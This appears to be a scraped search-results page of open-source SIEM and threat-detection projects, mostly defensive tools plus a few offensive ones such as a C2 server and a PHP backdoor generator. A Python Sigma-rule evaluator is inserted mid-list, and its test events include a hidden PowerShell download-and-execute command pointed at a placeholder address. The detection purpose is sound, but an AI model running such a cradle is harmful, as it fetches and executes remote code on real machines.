Awesome Open Source
Search results for siem
170 search results found
Wazuh
⭐
8,176
Wazuh - The Open Source Security Platform. Unified XDR and SIEM protection for endpoints and cloud workloads.
Sigma
⭐
7,706
Main Sigma Rule Repository
Graylog2 Server
⭐
6,945
Free and open log management
Redelk
⭐
2,299
Red Team's SIEM - tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
Mozdef
⭐
2,172
DEPRECATED - MozDef: Mozilla Enterprise Defense Platform
Elastdocker
⭐
1,596
🐳 Elastic Stack (ELK) v8+ on Docker with Compose. Pre-configured out of the box to enable Logging, Metrics, APM, Alerting, ML, and SIEM features. Up with a Single Command.
Matano
⭐
1,259
Open source security data lake for threat hunting, detection & response, and cybersecurity analytics at petabyte scale on AWS
Digital Forensics Guide
⭐
1,232
Digital Forensics Guide. Learn all about Digital Forensics, Computer Forensics, Mobile device Forensics, Network Forensics, and Database Forensics.
Sentinel Attack
⭐
1,038
Tools to rapidly deploy a threat hunting capability on Azure Sentinel that leverages Sysmon and MITRE ATT&CK
Pfelk
⭐
933
pfSense/OPNsense + Elastic Stack
Awesome Soc
⭐
906
A collection of sources of documentation, as well as field best practices, to build/run a SOC
Security Apis
⭐
835
A collective list of public APIs for use in security. Contributions welcome
Open Source Security Guide
⭐
795
Open Source Security Guide. Learn all about Security Standards (FIPS, CIS, FedRAMP, FISMA, etc.), Frameworks, Threat Models, Encryption, and Benchmarks.
Awesome Cybersecurity Blueteam Cn
⭐
659
Cybersecurity · Attack and Defense · Blue Team checklist, Chinese edition
Blueteam_homelabs
⭐
654
Great List of Resources to Build an Enterprise Grade Home Lab
Ninja
⭐
614
Open source C2 server created for stealth red team operations
Tenzir
⭐
612
Open source security data pipelines.
Event Forwarding Guidance
⭐
563
Configuration guidance for implementing collection of security relevant Windows Event Log events by using Windows Event Forwarding. #nsacyber
Siem
⭐
489
SIEM Tactics, Techniques, and Procedures
Purplecloud
⭐
461
A little tool to play with Azure Identity - Azure Active Directory lab creation tool
Dsiem
⭐
416
Security event correlation engine for ELK stack
Meerkat
⭐
407
A collection of PowerShell modules designed for artifact gathering and reconnaissance of Windows-based endpoints.
Psrecon
⭐
392
🚀 PSRecon gathers data from a remote Windows host using PowerShell (v2 or later), organizes the data into folders, hashes all extracted data, hashes PowerShell and various system properties, and sends the data off to the security team. The data can be pushed to a share, sent over email, or retained locally.
Evtx To Mitre Attack
⭐
370
Set of EVTX samples (>270) mapped to MITRE ATT&CK tactics and techniques, to measure your SIEM coverage or develop new use cases.
Awesome_threat Hunting
⭐
311
A curated list of the most important and useful resources about threat detection, hunting, and intelligence.
Ace
⭐
288
Automated Collection and Enrichment Platform
Attackdatamap
⭐
279
A data source assessment at the event level to show potential coverage of the MITRE ATT&CK framework
Cyber Sec Resources
⭐
277
An organized list of resources including tools, blog-posts and how-to tutorials compiled and created by SCSP community members.
Openuba
⭐
264
A robust and flexible open source User & Entity Behavior Analytics (UEBA) framework for security analytics. Developed with love by data scientists and security analysts from the cyber security industry. [PRE-ALPHA]
Threathunting Keywords
⭐
252
Awesome list of keywords for Threat Hunting sessions
Malwless
⭐
244
Test Blue Team detections without running any attack.
Xcyclopedia
⭐
216
Encyclopedia for Executables
Microsoft Sentinel Secops
⭐
211
Microsoft Sentinel SOC Operations
Snitchdns
⭐
205
Database Driven DNS Server with a Web UI
Ee Outliers
⭐
204
Open-source framework to detect outliers in Elasticsearch events
Bantam
⭐
186
A PHP backdoor management and generation tool/C2 featuring end-to-end encrypted payload streaming designed to bypass WAF, IDS, and SIEM systems.
Snowalert
⭐
179
Security Analytics Using The Snowflake Data Warehouse
Siembol
⭐
176
An open-source, real-time Security Information & Event Management tool based on big data technologies, providing a scalable, advanced security analytics framework.
Opensiem Logstash Parsing
⭐
170
SIEM Logstash parsing for more than hundred technologies
Clx
⭐
162
A collection of RAPIDS examples for security analysts, data scientists, and engineers to quickly get started applying RAPIDS and GPU acceleration to real-world cybersecurity use cases.
Gene
⭐
149
Signature engine for all your logs
Pie
⭐
147
📫 The Phishing Intelligence Engine - An Active Defense PowerShell Framework for Phishing Defense with Office 365
Logesp
⭐
137
Open Source SIEM (Security Information and Event Management system).
Sigmaui
⭐
127
SIGMA UI is a free open-source application based on the Elastic stack and Sigma Converter (sigmac)
Blue Teaming With Kql
⭐
125
Repository with Sample KQL Query examples for Threat Hunting
Artlas
⭐
119
Apache Real Time Logs Analyzer System
Ypsilon
⭐
116
Automated Use Case Testing
Siegma
⭐
116
SIEGMA - Transform Sigma rules into SIEM consumables
Sophos Central Siem Integration
⭐
107
Simple integration script for 3rd party systems such as SIEMs. Offers command line, file or syslog output in CEF, JSON or key-value pair formats.
Purpleteam
⭐
106
Purple team simulation and detection scripts: trigger events that exercise SOC detections
Rthvm
⭐
101
Resolvn Threat Hunting Virtual Machine
Siac
⭐
87
SIAC is an enterprise SIEM built on open-source technology.
Roota
⭐
86
RootA is a public-domain language for threat detection and response that combines native queries from a SIEM, EDR, XDR, or data lake with standardized metadata and threat intelligence, enabling automated translation into other query languages
Awesome Cybersecurity
⭐
81
Curated list of awesome cybersecurity companies and solutions.
Uncoder_io
⭐
81
An IDE and translation engine for detection engineers and threat hunters. Be faster, write smarter, keep 100% privacy.
Go Sigma Rule Engine
⭐
80
Golang library that implements a sigma log rule parser and match engine.
Controlcompass.github.io
⭐
76
Pointing cybersecurity teams to thousands of detection rules and offensive security tests aligned with common attacker techniques
Project Sauron
⭐
73
Tools to create a Native Windows Audit Collection Platform. Active Directory example provided
Zercurity
⭐
71
Manage, monitor and improve your cyber security posture.
Cloud Security List
⭐
70
A list of cloud security tools and vendors.
Sigmai
⭐
64
Import specific data sources into the Sigma generic and open signature format.
Talr
⭐
62
Threat Alert Logic Repository
Kong Api Manager
⭐
61
Kong API Manager with Prometheus And Graylog
Qradar
⭐
57
Unofficial third-party scripts, playbooks, and content for IBM QRadar & QRadar Community Edition.
Skaetl
⭐
55
Open Source ETL designed for and dedicated to Log processing and transformation
Reversinglabs Siem Rules
⭐
53
A collection of various SIEM rules relating to malware family groups.
Logmira
⭐
45
Logmira, by Blumira, was created by Amanda Berlin as a downloadable set of Microsoft Windows domain Group Policy Object settings.
Logrhythm.tools
⭐
44
LogRhythm PowerShell Toolkit
Redteamsiem
⭐
42
Repository of resources for configuring a Red Team SIEM using Elastic
Siem
⭐
40
The repository contains artifacts to create and publish reports, alerts, and dashboards based on Azure AD B2C logs. These artifacts can also be used for Security Information & Event Management (SIEM) related tasks.
Logcampaign
⭐
39
Provides detection capabilities and conversion of logs to EVTX or syslog
Documentation
⭐
38
SEKOIA.IO Documentation - The Intelligence-Driven SaaS SIEM
Awesomekql
⭐
38
Microsoft Sentinel, Defender for Endpoint - KQL Detection Packs
Detection Rules
⭐
36
Threat Detection & Anomaly Detection rules for popular open-source components
Ossim
⭐
35
Open Source Security Information and event Management
Utmstack
⭐
34
Customizable SIEM and XDR powered by Real-Time correlation and Threat Intelligence
Arcreactor
⭐
32
open-source intelligence gathering for SIEMs <3
Threathunting Keywords Sigma Rules
⭐
32
Sigma detection rules for hunting with the threathunting-keywords project
Gdpatrol
⭐
31
A Lambda-powered Security Orchestration framework for AWS GuardDuty
Threat Detection And Visualization
⭐
30
Threat Detection and Visualization
Littlesnitch Log Exporter
⭐
28
LittleSnitch Log Statistics Exporter
Cbc Syslog
⭐
28
Syslog Connector for the Carbon Black Cloud
Logstash Parsers
⭐
28
Sysmonconfigpusher
⭐
26
Pushes Sysmon Configs
Siem From Scratch
⭐
25
SIEM-From-Scratch is a drop-in ELK based SIEM component for your Vagrant infosec lab
Tigma
⭐
24
Sigma Engine implementation in TypeScript
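Several entries in this listing (Sigma, Sigmaui, Siegma, Go Sigma Rule Engine, Sigmai, Tigma, Threathunting Keywords Sigma Rules) deal with Sigma, the generic detection-rule format that those converters and engines translate into SIEM-specific queries or evaluate directly. As an added example that is not part of this listing or of any of those projects, the Python below evaluates one hand-written Sigma-style rule over a few constructed Sysmon-like process-creation events. The rule, the whitelisted parent process, the events, and every host and address in them are assumptions made for the example, and it implements only a subset of the Sigma specification (field modifiers, value lists, and boolean conditions; no wildcards or aggregations).

```python
"""Minimal Sigma-style rule evaluator (added example; not pySigma or any project's code).

Supported: field modifiers |contains, |startswith, |endswith, |re; value lists (OR);
fields within a selection (AND); conditions with and / or / not / parentheses.
Not supported: wildcards (* and ?), 'x of' selectors, aggregation expressions.
"""
import re
from typing import Any, Dict, List, Optional

# Rule laid out like a Sigma YAML document (logsource / detection / condition) but
# written as a dict so the example needs no YAML dependency. Constructed for this
# example; field names follow Sysmon Event ID 1 (process creation).
RULE: Dict[str, Any] = {
    "title": "Suspicious PowerShell download cradle (example rule)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest", "iwr "],
        },
        # Hypothetical whitelisted parent process used to show a filter in action.
        "filter_admin": {"ParentImage|endswith": "\\ConfigMgr.exe"},
        "condition": "selection and not filter_admin",
    },
}

# Constructed Sysmon-like events. 198.51.100.7 is a documentation-range address.
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS: List[Dict[str, Any]] = [
    {"Image": _PS, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/a.ps1')"},
    {"Image": _PS, "ParentImage": "C:\\Program Files\\Example\\ConfigMgr.exe",
     "CommandLine": "powershell -c Invoke-WebRequest http://198.51.100.7/inv.ps1"},
    {"Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "notepad.exe readme.txt"},
    {"Image": _PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell Get-Process"},
]


def _match_value(actual: Any, expected: Any, modifier: Optional[str]) -> bool:
    """Compare one event value against one rule value under a Sigma modifier."""
    if actual is None:
        return False
    a, e = str(actual), str(expected)
    if modifier is None:            # plain Sigma string matching is case-insensitive
        return a.lower() == e.lower()
    if modifier == "contains":
        return e.lower() in a.lower()
    if modifier == "startswith":
        return a.lower().startswith(e.lower())
    if modifier == "endswith":
        return a.lower().endswith(e.lower())
    if modifier == "re":            # the |re modifier is case-sensitive in Sigma
        return re.search(e, a) is not None
    raise ValueError(f"unsupported modifier: {modifier}")


def match_selection(selection: Dict[str, Any], event: Dict[str, Any]) -> bool:
    """All fields of a selection must match (AND); a list of values is an OR."""
    for key, expected in selection.items():
        field, _, modifier = key.partition("|")
        values = expected if isinstance(expected, list) else [expected]
        if not any(_match_value(event.get(field), v, modifier or None) for v in values):
            return False
    return True


class _ConditionParser:
    """Tiny recursive-descent parser: expr := term ('or' term)*, term := factor ('and' factor)*."""

    def __init__(self, tokens: List[str], results: Dict[str, bool]):
        self.toks, self.i, self.res = tokens, 0, results

    def peek(self) -> Optional[str]:
        return self.toks[self.i] if self.i < len(self.toks) else None

    def take(self) -> Optional[str]:
        tok = self.peek()
        self.i += 1
        return tok

    def expr(self) -> bool:
        value = self.term()
        while self.peek() == "or":
            self.take()
            rhs = self.term()          # evaluate unconditionally so syntax errors surface
            value = value or rhs
        return value

    def term(self) -> bool:
        value = self.factor()
        while self.peek() == "and":
            self.take()
            rhs = self.factor()
            value = value and rhs
        return value

    def factor(self) -> bool:
        tok = self.take()
        if tok is None:
            raise ValueError("unexpected end of condition")
        if tok == "not":
            return not self.factor()
        if tok == "(":
            value = self.expr()
            if self.take() != ")":
                raise ValueError("unbalanced parentheses in condition")
            return value
        if tok not in self.res:
            raise ValueError(f"unknown identifier in condition: {tok}")
        return self.res[tok]


def evaluate_condition(condition: str, results: Dict[str, bool]) -> bool:
    """Evaluate a Sigma condition string given the per-selection match results."""
    tokens = re.findall(r"\(|\)|[A-Za-z_][A-Za-z0-9_]*", condition)
    parser = _ConditionParser(tokens, results)
    value = parser.expr()
    if parser.peek() is not None:
        raise ValueError(f"unexpected token in condition: {parser.peek()}")
    return value


def match_rule(rule: Dict[str, Any], event: Dict[str, Any]) -> bool:
    """Evaluate every named selection, then combine them with the rule's condition."""
    detection = rule["detection"]
    results = {name: match_selection(sel, event)
               for name, sel in detection.items() if name != "condition"}
    return evaluate_condition(detection["condition"], results)


def matching_indices(rule: Dict[str, Any], events: List[Dict[str, Any]]) -> List[int]:
    """Indices of the events that trigger the rule."""
    return [i for i, ev in enumerate(events) if match_rule(rule, ev)]


if __name__ == "__main__":
    for i in matching_indices(RULE, EVENTS):   # → [0]
        print(f"[{RULE['title']}] event {i}: {EVENTS[i]['CommandLine']}")
```

Only the first event fires: the second also matches the selection but is suppressed by the filter because its parent is the whitelisted binary, the third is not PowerShell at all, and the fourth is PowerShell without any of the listed download strings. The same pattern of evaluating named selections independently and then combining them through the condition is what lets converters such as Siegma or engines such as the Go and TypeScript ones above target different back ends without changing the rule.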
Uls
⭐
24
Unified Log Streamer (ULS)
Msticnb
⭐
24
MSTIC Notebook Components
Blackesk
⭐
24
BLACK ESK SIEM is a SIEM platform built with Elasticsearch, Syslog-Ng and Kibana
Swelf
⭐
24
Simple Windows Event Log Forwarder (SWELF). An easy-to-use log forwarder and EVTX parser that simply works. Almost in full release here at https://github.com/ceramicskate0/SWELF/releases/la
Ansible Splunk Playbook
⭐
23
Install a full Splunk Enterprise Cluster or Universal forwarder using an ansible playbook
Jube
⭐
23
Jube is open-source software for monitoring transactions and events. It offers real-time data wrangling, artificial intelligence, decision making, and case management, and is particularly suited to fraud prevention and abuse detection.
Auditbeat In Action
⭐
22
Demo for Elastic's Auditbeat and SIEM
Uba
⭐
22
UEBA Solution for Insider Security. This repo is archived. Thanks!
Thehive2sigma
⭐
22
Python script to automatically create Sigma rules from TheHive observables
Osintrealtimecnd
⭐
22
Proactive Computer Network Defense Strategy - OSINT Real Time Threat Stream - Social/DarkNet - Data Mining
Cli Eaa
⭐
21
CLI for Enterprise Application Access (EAA)
Nector
⭐
21
A SIEM inspired by HECTOR, built on Django.
Wazuh2thehive
⭐
19
Wazuh integration with TheHive
U Siem Core
⭐
19
Framework definitions that allow building a custom SIEM.
1-100 of 170 search results
Copyright 2018-2024 Awesome Open Source. All rights reserved.